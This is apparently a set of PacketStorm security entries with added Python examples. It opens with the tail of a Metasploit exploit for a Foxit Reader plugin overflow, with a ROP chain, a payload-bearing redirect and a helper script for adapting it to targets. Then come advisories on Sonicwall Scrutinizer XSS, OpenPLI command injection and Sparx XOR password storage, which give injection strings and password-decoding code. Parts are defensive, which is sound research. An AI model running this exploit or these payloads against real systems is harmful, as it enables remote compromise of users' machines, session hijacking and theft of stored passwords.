    firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || ''

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    end

    if os_name == 'Windows 7' and firefox =~ /18/
      return targets[1]
    end

    return nil
  end

  def junk
    return rand_text_alpha(4).unpack("L")[0].to_i
  end

  def nops
    make_nops(4).unpack("N*")
  end

  # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module)
  def win7_rop_chain
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
    [
      0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll]
      0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]
      0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]
      0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]
      0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll]
      0x41414141, # Filler (RETN offset compensation)
      0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll]
      0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll]
      0x00001000, # 0x00001000-> edx
      0x1000d9ec, # XOR EDX, EDX # RETN
      0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]
      junk,
      0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll]
      junk,
      junk,
      junk,
      0x41414141, # Filler (RETN offset compensation)
      0x00000040, # 0x00000040-> ecx
      0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll]
      0x00000001, # 0x00000001-> ebx
      0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll]
      0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll]
      0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll]
      nops,
      0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll]
    ].flatten.pack("V*")

    return rop_gadgets
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    unless self.respond_to?(my_target[:rop])
      print_error("Invalid target specified: no callback function defined")
      send_not_found(cli)
      return
    end

    return if ((p = regenerate_payload(cli)) == nil)

    # we use two responses:
    # one for an HTTP 301 redirect and sending the payload
    # and one for sending the HTTP 200 OK with appropriate Content-Type
    if request.resource =~ /\.pdf$/
      # sending Content-Type
      resp = create_response(200, "OK")
      resp.body = ""
      resp['Content-Type'] = 'application/pdf'
      resp['Content-Length'] = rand_text_numeric(3,"0")
      cli.send_response(resp)
      return
    else
      resp = create_response(301, "Moved Permanently")
      resp.body = ""

      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']

      if datastore['SSL']
        schema = "https"
      else
        schema = "http"
      end

      # the overflow is measured from the start of the whole URL the plugin
      # receives, so the padding shrinks as the redirect prefix grows
      sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length)
      sploit << [my_target.ret].pack("V")                # EIP
      sploit << [my_target['WritableAddress']].pack("V") # Writable Address
      sploit << self.send(my_target[:rop])
      sploit << p.encoded

      resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
      cli.send_response(resp)

      # handle the payload
      handler(cli)
    end
  end

end

Source: PacketStorm
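The one thing in on_request_uri that is easy to get wrong when porting this to another target is the padding arithmetic: the 272-byte offset counts from the first byte of the resolved URL, so the scheme, host, port and request path eat into the junk. The following is an added example, not part of the Metasploit module above, that reproduces that layout in Python and lets you check where EIP lands before you point a real target at it. The ROP and payload bytes are constructed stand-ins; only OFFSET, RET and WRITABLE come from the module's target table.

```python
import struct
from urllib.parse import unquote_to_bytes

# From the module's target entry; everything else below is constructed.
OFFSET = 272
RET = 0x1000c57d        # pop eax # ret in npFoxitReaderPlugin.dll
WRITABLE = 0x10045c10   # writable address in the same (non-ASLR) module

ROP_STUB = b"\xde\xad\xbe\xef" * 4   # stand-in for win7_rop_chain, 16 bytes
PAYLOAD_STUB = b"\xcc" * 16          # stand-in for p.encoded, 16 bytes


def hex_all(data: bytes) -> str:
    """Equivalent of Rex::Text.uri_encode(str, 'hex-all'): every byte as %XX."""
    return "".join(f"%{b:02X}" for b in data)


def prefix_fits(scheme: str, host: str, port: int, uri: str) -> bool:
    """The module never checks this: if the prefix alone is longer than the
    offset, rand_text_alpha gets a negative length and the layout is wrong."""
    return len(f"{scheme}://{host}:{port}{uri}.pdf?") <= OFFSET


def build_location(scheme: str, host: str, port: int, uri: str,
                   rop: bytes, payload: bytes) -> str:
    """Mirror of the Location value built in on_request_uri."""
    prefix = f"{scheme}://{host}:{port}{uri}.pdf?"
    pad_len = OFFSET - len(prefix)
    if pad_len < 0:
        raise ValueError("prefix alone exceeds the offset; shorten host or uri")
    sploit = b"A" * pad_len                 # rand_text_alpha in the module
    sploit += struct.pack("<I", RET)        # EIP
    sploit += struct.pack("<I", WRITABLE)   # writable address
    sploit += rop
    sploit += payload
    # the redirect target is relative: request.uri + '.pdf?' + encoded sploit
    return uri + ".pdf?" + hex_all(sploit)


def full_url_bytes(scheme: str, host: str, port: int, location: str) -> bytes:
    """What the plugin ends up holding once the browser resolves the redirect."""
    return f"{scheme}://{host}:{port}".encode() + unquote_to_bytes(location)


def layout(scheme: str, host: str, port: int, uri: str,
           rop: bytes = ROP_STUB, payload: bytes = PAYLOAD_STUB) -> dict:
    """Return where each piece landed in the resolved URL, for checking."""
    url = full_url_bytes(scheme, host, port,
                         build_location(scheme, host, port, uri, rop, payload))
    eip = url.find(struct.pack("<I", RET))
    return {
        "eip": eip,
        "writable_ok": url[eip + 4:eip + 8] == struct.pack("<I", WRITABLE),
        "rop_ok": url[eip + 8:eip + 8 + len(rop)] == rop,
        "payload_ok": url[eip + 8 + len(rop):eip + 8 + len(rop) + len(payload)] == payload,
        "total_len": len(url),
    }


if __name__ == "__main__":
    for host in ("10.0.0.1", "attacker.example.internal"):
        print(host, layout("http", host, 8080, "/x9z"))
```

Whatever the host length, the return address must sit at byte 272 of the resolved URL; if it does not, the prefix length assumption in the module (SRVHOST as seen by the victim, plus the random request path) no longer matches what the browser actually sends.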
-
Sonicwall OEM Scrutinizer version 9.5.2 suffers from multiple persistent script insertion vulnerabilities that can allow for cross site scripting.

Title:
======
Sonicwall OEM Scrutinizer v9.5.2 - Multiple Web Vulnerabilities

Date:
=====
2013-02-14

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=786

VL-ID:
=====
786

Common Vulnerability Scoring System:
====================================
5.2

Introduction:
=============
Dell™ SonicWALL™ Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can deploy Scrutinizer as a virtual appliance for high performance environments.

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Dell Sonicwall OEM Scrutinizer v9.5.2 appliance application.
Report-Timeline:
================
2012-12-05: Researcher Notification & Coordination
2012-12-07: Vendor Notification
2013-01-08: Vendor Response/Feedback
2013-02-10: Vendor Fix/Patch
2013-02-11: Public or Non-Public Disclosure

Status:
========
Published

Affected Products:
==================
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple persistent input validation vulnerabilities are detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).

The first persistent vulnerability is located in the Alarm - New Board & Policy Manager module with the bound vulnerable Search item - BBSearchText parameter request. The vulnerability allows injecting persistent script code as the search item value. The result is the persistent execution of script code out of the BBSearchText listing.

The second persistent vulnerability is located in the Dashboard - Flow Expert module with the bound vulnerable Mytab parameter. The vulnerability allows injecting persistent script code as the myTab link value. The result is the persistent execution of script code out of the Mytab link listing.

The 3rd persistent vulnerability is located in the MyView (CGI) module with the bound vulnerable `newName` parameter request. The vulnerability allows injecting persistent script code as newName. The result is the persistent execution of script code out of the core value listing.

The 4th persistent vulnerability is located in the Admin > Admin [New Users & New Group] module with the bound vulnerable groupName & username parameters. The vulnerability allows injecting persistent script code as username or groupname. The result is the persistent execution of script code out of all username and group listings + checkboxes.
The 5th persistent vulnerability is located in the Admin > Admin [Mapping / Maps (CGI) - Dashboard Status] module with the bound vulnerable groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name & settings groups(checkbox) parameters. The vulnerability allows injecting persistent script code as the groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name & settings groups(checkbox) value(s). The result is the persistent execution of script code out of the groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name listings and settings groups checkbox.

The 6th persistent vulnerability is located in the Alarms > Overview Bulletin Board > Advanced Filters module with the bound vulnerable displayBBAdvFilterModal() - (Policy Name, Board Name, Violators) parameters. The vulnerability allows injecting persistent script code as Policy Name, Board Name and Violator. The result is the persistent execution of script code out of the Policy Name, Board Name and Violator listings.

Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin), persistent phishing, persistent external redirects to malware or scam and persistent web context manipulation in the affected vulnerable module(s). Exploitation requires low user interaction & a low privileged appliance web application user account.
Vulnerable Section(s):
[+] Alarm
[+] Dashboard
[+] MyView (CGI)
[+] Admin > Admin
[+] Admin > Admin
[+] Alarms

Vulnerable Module(s):
[+] New Board & Policy Manager
[+] Flow Expert
[+] Value
[+] New Users & New Group
[+] Mapping / Maps (CGI) - Dashboard Status
[+] Overview Bulletin Board > Advanced Filters

Vulnerable Parameter(s):
[+] Search item - BBSearchText
[+] Mytab
[+] newName
[+] groupName & username - Place in Usergroup - Listing
[+] groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name & settings groups(checkbox)
[+] displayBBAdvFilterModal() - (Policy Name, Board Name, Violators)

Proof of Concept:
=================
The persistent input validation web vulnerabilities can be exploited by remote attackers with a low privileged application user account and low required user interaction. For demonstration or to reproduce ...

Review: Alarm > New Board & Policy Manager - [BBSearchText] Search item

<td class="textRight agNoWrap"> <input id="BBSearchText" title="Search item" value="<<[PERSISTENT INJECTED SCRIPT CODE!];)" <="""=""></iframe> <input class="button" id="BBSearchButton" value="Search" title="Search" onclick="bbSearch(this)" type="button"> <input class="button" onclick="displayBBAdvFilterModal()" title="Search using multiple criteria" value="Advanced Filters" type="button">

Review: Dashboard > Flow Expert > Mytab - [Mytab Name]

<div><span class="myv_tab"><span tid="1" style="margin-left: 10px; margin-right: 10px;">Flow Expert</span></span> <span class="myv_tab"><span tid="2" style="margin-left: 10px; margin-right: 10px;">Configure Flow Analytics</span></span> <span class="myv_tab"><span tid="3" style="margin-left: 10px; margin-right: 10px;">CrossCheck</span></span><span class="myv_tab"> <span tid="4" style="margin-left: 10px; margin-right: 10px;">Example</span></span><span class="myv_tab"><span tid="5" style="margin-left: 10px; margin-right: 10px;">Cisco PfR</span></span><span class="myv_tab"><span tid="6" style="margin-left: 10px; 
margin-right: 10px;">Training</span></span><span class="myv_selectedtab"><span title="Click to rename" class="jedit" id="tab_7" origname="My New Tab"><[PERSISTENT INJECTED SCRIPT CODE!]">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></span> <img style="margin-left: 6px; cursor: pointer;" src="Scrutinizer%20%29%20Dashboard-Dateien/tab-edit.gif"></span><span class="add_tab"> <span style="margin-left: 6px; cursor: pointer;">Add a tab</span></span></div> Review: MyView (CGI) > Value - [newName] <html><head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head> <body>{"newName":"<[PERSISTENT INJECTED SCRIPT CODE!]"> \"><[PERSISTENT INJECTED SCRIPT CODE!]") <"}</iframe></body> </html> Review: Admin > Admin > New Users & New Group - [groupname, up_availGroups & username - Place in Usergroup - Listing] <div class="unfortunate" style="" id="settingsContent"> <div id="settingsHeader"></div> <div id="settingsOutput"> <title>User Preferences</title> <div id="mainFrame"> <div style="height: 552px;" id="upMenu"><div class="basic ui-accordion selected" style="float:left;" id="upTreeMenu"> <a class="selected"> New User</a><div style="height: 511px; display: block; overflow: hidden;" class="genericAccordionContainer"> <p style="padding-left: 10px;" id="new_user_panel"><label>Username: <input class="newform" id="new_username" type="text"></label><label>Password <input class="newform" id="new_password" type="password"><img id="pw_strength" src="/images/common/strength_0.gif"></label><label>Confirm Password: <input class="newform" id="cnf_password" type="password"> </label><label style="margin-top: 5px; margin-bottom: 8px;" id="up_availGroupsLbl">Place in User Group <select style="display: block;" id="up_availGroups"><option value="3"><iframe src="a"> "><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></option> <option value="1">Administrators</option><option value="2">Guests</option></select></label>?????<input value="Create User" class="button" 
style="margin-top: 3px;" type="button"></p></div><a class=""> Users</a><div style="height: 511px; display: none; overflow: hidden;" class="genericAccordionContainer"><p id="users_p"><span class="menuLink">admin</span></p></div></div></div> Review: Admin > Admin > Mapping/Maps (CGI) - Dashboard Status - [groupMembers, Type, Checkbox Linklike, indexColumn,name,ObjectName & settings groups] <div class="fmapsScroll" id="groupScroll"><table class="dataTable filterable" id="grpTable"><tbody id="grpTbody"><tr id="grpTblHdr"> <th width="20"><input id="checkAllObj" name="checkAllObj" title="Permanently delete groups" type="checkbox"></th><th style="width: 100%;" class="alignLeft">Group Name</th><th width="40">Type</th><th width="40">Membership</th><th width="40">Map Status</th></tr><tr id="grp_tr1"> <td><input title="Permanently delete this object from ALL groups" name="1" type="checkbox"></td><td class="alignLeft"><a title="Click here to edit this group" href="#NA" class="linkLike"><iframe src="a">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...</iframe></a> </td><td>Google</td><td><a title="Click to change object membership for this group" class="linkLike">Membership</a></td><td><select id="pass_1" class="passSel"><option value="0">No Pass</option> <option value="1">Pass Up</option></select></td> <td style="display: none;" class="indexColumn">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...googlemembershipno passpass up</td></tr></tbody></table></div><input style="margin-top: 10px; margin-left: 8px;" id="delObjectBtn" value="Delete" class="button" type="button"><div id="editGrpDiv"><div id="obj_typeForm"><div id="iconPreview"><img src="/images/maps/group16.png" id="previewImage"></div> <div id="toGroupMsg"></div><select style="margin-left: 30px; margin-bottom: 5px; width: 159px;" id="obj_iconSelect" name="icon"><option value="gicon16.png">gicon16.png</option><option value="gicon24.png">gicon24.png</option><option value="gicon32.png">gicon32.png</option> 
<option value="gicon48.png">gicon48.png</option><option value="gicon72.png">gicon72.png</option><option value="group16.png">group16.png</option> <option value="group24.png">group24.png</option><option value="group32.png">group32.png</option><option value="group48.png">group48.png</option> <option value="group72.png">group72.png</option></select></div><table id="editGroupTable" class="dataTable"><tbody><tr id="grpTypeRow"> <td class="alignLeft cellHeader">Type</td><td class="alignLeft"><select id="edit_grpType"><option value="flash">Flash</option> ... <table class="dataTable" id="fmaps_mapTabList" width="100%"><thead><tr>?????<th style="white-space: nowrap;" nowrap="">Map</th> <th style="white-space: nowrap;" nowrap="">Type</th><th style="white-space: nowrap;" nowrap="">Background</th></tr></thead><tbody> <tr><td class="" style="white-space: nowrap; padding-right: 5px;" align="left" nowrap=""><a href="#NA"><iframe src="a">%20%20%20%20"> <iframe src=a onload=alert("VL") <</iframe></a></td><td class="" style="white-space: nowrap;" align="left" nowrap="" width="100%">Google</td> ?????<td class="" align="center">-</td></tr></tbody></table> ... 
<tbody id="objTbody"><tr id="objTblHdr"><th width="20"><input id="checkAllObj" name="checkAllObj" type="checkbox"></th><th width="20"> </th>?????<th style="width: 100%;" tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: center;" align="center" nowrap=""> Type</th><th width="20">Membership</th></tr><tr id="obj_tr1"><td class="fmaps_bakTrHi highlightRow"> </td><td class="fmaps_bakTrHi highlightRow"><img class="listIcon" src="/images/maps/gicon24.png"></td><td class="alignLeft fmaps_bakTrHi highlightRow"><a title="Click to edit this object" href="#NA"><iframe src="a">%20%20%20%20"><iframe src=...</iframe></a></td><td class="fmaps_bakTrHi highlightRow" nowrap=""> <span style="cursor:default;">Group</span></td><td class="fmaps_bakTrHi highlightRow"><a title="Click to change group membership for this object" class="linkLike">Membership</a>?????</td><td style="display: none;" class="indexColumn fmaps_bakTrHi highlightRow"> %20%20%20%20"><iframe src=...groupmembership</td></tr></tbody> ... <td style="padding-right: 1px; padding-bottom: 1px; padding-left: 1px;" id="fmaps_confBody" valign="top"><div style="height: 19px;" id="fmaps_containerTitle" class="titleBar">?????<span style="float:left" ;="">Settings</span><img title="Map Settings Help" src="/images/common/help.png"><select id="fmaps_groupSelect"> <option class="google" value="1"><iframe src="a">%20%20%20%20"><iframe src=a onload=alert("VL") < (google) </iframe></option></select></div>?????<div id="fmaps_confBodyContainer"><div id="defaultsContainer"> ... 
<li class="expandable noWrapOver " groupid="g1"> <div class="hitarea expandable-hitarea "> </div> <img src="/images/common/gicon.png" gid="1" title="<iframe src=a>%20%20%20%20"><iframe src="a" onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe> <span id="sdfTreeLoadG" class="" title="<iframe src=a>%20%20%20%20"><iframe src=a onload=alert("VL") < (Group ID: 1)" gid="1"><iframe src="a">%20%20%20...</span> <ul style="display: none;"> <li>Loading...</li> </ul> </li> <li class='expandable noWrapOver lastExpandable'> <div class='hitarea expandable-hitarea lastExpandable-hitarea'> </div> <img src='/images/common/TreeUngroupGray.png'/><span class="">Ungrouped</span> <ul style="display: none;"> <li class="last"><span class=" ">No Devices</span></li> </ul> </li> </ul> </iframe></span></li>

Solution:
=========
2013-02-10: Vendor Fix/Patch
Where changing code paths to use bound variables was not practical in such a short timeframe, we pass inputs included in a query through a function that escapes potentially dangerous characters.

Risk:
=====
The security risk of the persistent input validation web vulnerabilities is estimated as medium(+)|(-)high.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Source: PacketStorm
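The advisory's PoC snippets show the same stored value landing in three different parsing contexts: a quoted attribute (the BBSearchText value="..."), a text node (the renamable tab label) and a JSON body that the MyView CGI served with a text/html content type, so the browser parsed the braces as markup. The vendor's fix note talks about "a function that escapes potentially dangerous characters"; which characters are dangerous depends on the context. The following is an added example, not code from Scrutinizer or from the advisory, showing one encoder per context against a constructed payload in the shape the PoC uses. Element ids and the JSON key are taken from the advisory text; the payload string itself is mine.

```python
import html
import json

# Constructed sample in the shape of the advisory's PoC: close the attribute,
# then an iframe with an onload handler. Not the researcher's exact string.
PAYLOAD = '"><iframe src=a onload=alert("VL")>'


def render_search_input(value: str) -> str:
    """The failing shape: the stored search item is spliced into value="..."
    as-is, so the first double quote in it terminates the attribute."""
    return f'<input id="BBSearchText" title="Search item" value="{value}">'


def render_search_input_safe(value: str) -> str:
    """Attribute context: html.escape(quote=True) turns " into &quot; and
    < > & into entities, so the value can never close the attribute."""
    return f'<input id="BBSearchText" title="Search item" value="{html.escape(value, quote=True)}">'


def render_tab_safe(name: str) -> str:
    """Text-node context (the renamable Flow Expert tab label)."""
    return f'<span class="jedit" id="tab_7">{html.escape(name)}</span>'


def render_json_safe(obj) -> tuple:
    """The MyView CGI answered {"newName": ...} with text/html. Two fixes at
    once: declare application/json so the browser does not render it, and
    escape the HTML-significant characters inside the JSON so the body is
    inert even where someone still displays it as markup. json.loads still
    returns the original value, so consumers of the API are unaffected."""
    body = json.dumps(obj)
    body = body.replace("&", "\\u0026").replace("<", "\\u003c").replace(">", "\\u003e")
    return "application/json", body


def json_round_trips(obj) -> bool:
    _, body = render_json_safe(obj)
    return json.loads(body) == obj


def has_live_tag(rendered: str) -> bool:
    """Demo check: does an iframe start tag survive as real markup?"""
    return "<iframe" in rendered.lower()


if __name__ == "__main__":
    print(render_search_input(PAYLOAD))
    print(render_search_input_safe(PAYLOAD))
    print(render_tab_safe(PAYLOAD))
    print(render_json_safe({"newName": PAYLOAD}))
```

The point to carry away: escaping on input ("dangerous characters") is what the vendor note describes, but the reliable fix is encoding on output for the exact context the value is written into, because the same stored string is safe in one context and live in another.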
-
OpenPLI Dream Multimedia Box suffers from cross site scripting and remote OS command injection vulnerabilities.

Device Name: OpenPLI - Dream Multimedia Box with OpenPLI software
Vendor of device: Dream Multimedia
Vendor of Software: OpenPLI Community

============
Device Details:
============
Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011
Firmware release 1.1.0, 27.01.2013
FP Firmware 1.06
Web Interface 6.0.4-Expert - PLi edition by [lite]
More info: http://openpli.org/

============
Vulnerability Overview:
============

* OS Command Execution:

parameter: maxmtu

The vulnerability is caused by missing input validation in the maxmtu parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to use Netcat to fully compromise the device.

http://Target-IP/cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26&hddstandby=2&hddacoustics=160&timeroffsetstart=0&timeroffsetstop=0&audiochannelspriority=&showsatpos=on&trustedhosts=&epgcachepath=%2Fhdd&epgsqlpath=%2Fvar%2Flib%2Fsqlite

It is possible to shorten the URL to the following:

http://Target-IP/cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26

There is Netcat preinstalled on the device. It is a very small edition of netcat, so you have to play a bit with it, but you will get it.

* stored XSS:

Box Control -> Configuration -> Webserver -> User, Password
parameter: AuthUser, AuthPassword

Box Control -> Configuration -> Settings
parameter: audiochannelspriority

Injecting scripts into the parameter audiochannelspriority reveals that this parameter is not properly validated for malicious input.

============
Solution
============
No known solution available.

============
Credits
============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

Source: PacketStorm
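The %26COMMAND%26 in the advisory's URL decodes to &COMMAND&, and the ampersands are what make the injection work: in a Bourne shell, & ends the preceding command and backgrounds it, so whatever the CGI spliced in front of maxmtu runs, then COMMAND runs, with no quoting to break out of. The following is an added example, not the OpenPLI CGI and not the researcher's code, that parses the advisory's URL shape, shows the vulnerable "concatenate into a shell line" pattern executing an injected command, and puts the hardened version beside it. Since the advisory does not show the script behind setConfigSettings, echo stands in for the ifconfig/ip invocation the box really makes (an assumption), and the 576..9000 MTU range is my choice of sane bound, not something from the advisory.

```python
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Constructed requests in the shape the advisory gives; "echo INJECTED" stands in for COMMAND.
ATTACK_URL = "http://Target-IP/cgi-bin/setConfigSettings?maxmtu=%26echo%20INJECTED%26"
BENIGN_URL = "http://Target-IP/cgi-bin/setConfigSettings?maxmtu=1500"


def maxmtu_from_url(url: str) -> str:
    """Pull the maxmtu value out of the query string the way a CGI sees it
    (already percent-decoded, so %26 has become a literal ampersand)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("maxmtu", [""])[0]


def set_mtu_vulnerable(raw: str) -> str:
    """The failing pattern: the raw value is spliced into a shell command line.
    'echo' stands in for the real interface command (assumption); the shell
    treats the injected '&' identically whatever the command in front of it is."""
    proc = subprocess.run("echo mtu " + raw, shell=True, capture_output=True, text=True)
    return proc.stdout


MTU_RE = re.compile(r"[0-9]{3,4}")


def validate_mtu(raw: str) -> int:
    """Positive validation: ASCII digits only, then a range check. Anything that
    is not a plain number is rejected before it gets near a command."""
    if not MTU_RE.fullmatch(raw):
        raise ValueError("maxmtu must be 3-4 ASCII digits")
    mtu = int(raw)
    if not 576 <= mtu <= 9000:
        raise ValueError("maxmtu out of range")
    return mtu


def set_mtu_safe(raw: str) -> str:
    """Validated integer passed as its own argv element, no shell involved:
    even if validation were looser, there is no command line to inject into."""
    mtu = validate_mtu(raw)
    proc = subprocess.run(["echo", "mtu", str(mtu)], capture_output=True, text=True)
    return proc.stdout


def rejects(raw: str) -> bool:
    try:
        validate_mtu(raw)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    raw = maxmtu_from_url(ATTACK_URL)
    print("decoded parameter:", repr(raw))
    print("vulnerable handler output:", repr(set_mtu_vulnerable(raw)))
    print("safe handler rejects it:", rejects(raw))
    print("safe handler output for 1500:", repr(set_mtu_safe("1500")))
```

Both changes matter on their own: the allowlist regex would have stopped this report, and dropping shell=True removes the class of bug even for parameters that genuinely need free text.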
-
Sparx Systems Enterprise Architect version 9.3.931 stores user passwords in the database simply XORed with the ASCII code of 'E17030402158' instead of using a generally accepted hash function.

Subject
=======
Simple password obfuscation in Sparx Systems "Enterprise Architect" when using server based repositories

Affected product
================
Product: Enterprise Architect
Vendor: Sparx Systems

Affected versions
=================
Tested with 9.3.931 Corporate, other versions likely to be affected too.

Description
===========
When using server based repositories in Enterprise Architect the user account information is stored in the database table t_secuser. The column "Password" contains the user password in an obfuscated format. The content is simply the user password XOR'ed with the ASCII code of 'E17030402158' instead of using a generally accepted hash function. Hence everyone with access to the database (which is in general every user with access to the repository) is able to decode the passwords of all other users.

Impact
======
Disclosure of user passwords.

Possible mitigating factors
===========================
Beginning with version 7.1 Enterprise Architect offers a feature where project owners can provide users with a shortcut to the project that contains the database connection string in an encrypted format. This should avoid the need to reveal database access credentials to end users.

Conclusion
==========
Everyone with access to the database containing the repository is able to decode the passwords of all users. Irrespective of the fact that ordinary end users may be prevented from gaining access to the database using the "Encrypt Connection String" feature, at least SQL admins may still read the t_secuser table and are therefore able to decode the passwords.

Chronology
==========
Vendor informed: 2012/01/28
Vendor reminded: 2012/02/06
Vendor response: 2012/02/07
Summary of vendor response:
- "We are aware of these limitations"
- "No fixes are scheduled at this time."
Released to public: 2012/02/12

Reported by
===========
Holm Diening
Dept. Privacy and Information Security
E-Mail: holm.diening@gematik.de
www.gematik.de

gematik Gesellschaft für Telematikanwendungen der Gesundheitskarte mbH
Friedrichstraße 136
10117 Berlin
Amtsgericht Berlin-Charlottenburg HRB 96351 B
Geschäftsführer: Prof. Dr. Arno Elmer

Source: PacketStorm
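Two properties of a fixed-key XOR make the advisory's conclusion unavoidable: the operation is its own inverse, so anyone holding the key decodes every row, and the key itself falls out of a single known plaintext, so even an attacker who never read the advisory only needs one account they control. The following is an added example, not Sparx code and not the reporter's, that works through both and contrasts them with a salted PBKDF2 record, which is what "a generally accepted hash function" buys you. The key constant is the one named in the advisory; the assumption that the stored column is the raw byte-wise XOR with the key repeated is mine, since the advisory does not spell out the column encoding.

```python
import hashlib
import hmac
import os

KEY = b"E17030402158"   # the constant named in the advisory


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR. Assumption: the stored column is the password bytes
    XORed with the key bytes, cycling the key when the password is longer."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate(password: str, key: bytes = KEY) -> bytes:
    return xor_with_key(password.encode("utf-8"), key)


def deobfuscate(stored: bytes, key: bytes = KEY) -> str:
    """XOR is its own inverse, so 'decryption' is the same operation."""
    return xor_with_key(stored, key).decode("utf-8")


def recover_key(stored: bytes, known_password: str) -> bytes:
    """Known plaintext: XOR a password you know (your own) against its stored
    form and the key stream drops out; it repeats with period len(KEY), which
    is how an attacker who has never seen the advisory finds the key anyway."""
    return bytes(s ^ p for s, p in zip(stored, known_password.encode("utf-8")))


def dump_table(rows, key: bytes) -> dict:
    """What any reader of t_secuser can do once the key is known.
    rows: iterable of (username, stored_bytes)."""
    return {user: deobfuscate(stored, key) for user, stored in rows}


# Hardened alternative: salted, iterated hash. A database reader learns
# salt+digest, which does not reverse and cannot be reused across accounts.
PBKDF2_ROUNDS = 200_000


def hash_password(password: str, salt: bytes = None) -> bytes:
    salt = os.urandom(16) if salt is None else salt
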